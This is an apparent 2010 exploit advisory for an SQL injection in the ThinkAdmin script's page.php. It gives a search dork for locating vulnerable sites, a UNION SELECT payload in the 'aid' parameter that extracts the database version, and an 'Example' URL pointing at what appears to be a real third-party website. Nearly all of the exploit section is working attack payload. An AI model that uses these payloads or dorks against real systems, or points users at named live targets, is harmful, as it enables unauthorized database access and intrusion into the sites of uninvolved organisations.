ThinkAdmin (page.php) Sql Injection Vulnerability
==========================================================

###########################################
.:. Author         : AtT4CKxT3rR0r1ST

.:. Email          : F.Hack@w.cn

.:. Team           : Sec Attack Team

.:. Home           : www.sec-attack.com/vb

.:. Script         : ThinkAdmin

.:. Script Download: http://www.thinkadmin.net/

.:. Bug Type       : Sql Injection[Mysql]

.:. Dork           : Powered by ThinkAdmin

.:. Date           : 30/1/2010

#############################################

===[ Exploit ]===

www.site.com/page.php?id=21&aid=12[SQL INJECTION]&s=3

www.site.com/page.php?id=21&aid=-12'+union+select+1,version(),3,4,5,6,7,8-- -&s=3

===[ Example ]===

http://www.chect.org.uk/page.php?id=21&aid=-12'union+select+1,version(),3,4,5,6,7,8-- -&s=3

#############################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack


________________________________
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.<https://signup.live.com/signup.aspx?id=60969>